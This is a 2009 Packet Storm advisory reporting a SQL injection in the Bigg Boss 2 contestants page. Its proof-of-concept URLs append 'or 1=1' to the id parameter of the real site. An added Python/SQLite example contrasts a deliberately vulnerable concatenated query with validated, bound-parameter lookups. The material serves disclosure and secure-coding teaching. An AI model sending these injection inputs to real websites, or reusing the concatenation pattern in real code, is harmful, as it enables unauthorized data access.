biggboss2 SQL Injection

2009-02-18T00:00:00
ID PACKETSTORM:75025
Type packetstorm
Reporter Jaydeep Dave
Modified 2009-02-18T00:00:00

Description

                                        
```
====================================================================
Website: http://biggboss2.in.com/

Category: TV Show

Vulnerability: Inband SQL Injection

Founder: Jaydeep Dave[jaydipdave@gmail.com]

Date: 16th Feb, 2009
====================================================================

== P O C ===========================================================

URL:
http://biggboss2.in.com/contestants.php?msgvote=0&id=10

Vulnerable URL:
http://biggboss2.in.com/contestants.php?msgvote=0&id=10 or 1=1
http://biggboss2.in.com/contestants.php?msgvote=0&id=-10 or 1=1

====================================================================
```
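
The PoC appends `or 1=1` to the numeric `id` parameter. The following is an added example, not code from the advisory or from the site: it shows why that input changes the result set when the parameter is concatenated into the query, and how integer validation plus a bound parameter prevents it. The site's server-side code is not on the page, so the table, rows and function names are constructed, and Python with SQLite stands in for the site's PHP back end.

```python
import sqlite3


def make_db():
    # Constructed sample data; the real site's schema is not known.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE contestants (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany(
        "INSERT INTO contestants VALUES (?, ?)",
        [(9, "contestant-a"), (10, "contestant-b"), (11, "contestant-c")],
    )
    return db


def lookup_concatenated(db, id_param):
    # Vulnerable pattern: the raw parameter becomes part of the SQL text,
    # so "10 or 1=1" is parsed as an extra, always-true condition.
    sql = "SELECT id, name FROM contestants WHERE id = " + id_param
    return db.execute(sql).fetchall()


def lookup_hardened(db, id_param):
    # Hardened pattern: accept only a plain (optionally negative) integer,
    # then bind it as a parameter so it is never parsed as SQL.
    text = id_param.strip()
    digits = text[1:] if text[:1] == "-" else text
    if not (digits.isascii() and digits.isdigit()):
        raise ValueError("id must be an integer")
    sql = "SELECT id, name FROM contestants WHERE id = ?"
    return db.execute(sql, (int(text),)).fetchall()


def row_counts(id_param):
    # Returns (rows from concatenated query, rows from hardened query);
    # the second value is None when the hardened lookup rejects the input.
    db = make_db()
    unsafe = len(lookup_concatenated(db, id_param))
    try:
        safe = len(lookup_hardened(db, id_param))
    except ValueError:
        safe = None
    return unsafe, safe


if __name__ == "__main__":
    # The id values are the ones shown in the PoC URLs.
    for value in ("10", "10 or 1=1", "-10 or 1=1"):
        print(repr(value), row_counts(value))
```

The `-10` variant is the clearer signal when reviewing logs or test results: no record has that id, so any rows returned can only come from the injected condition.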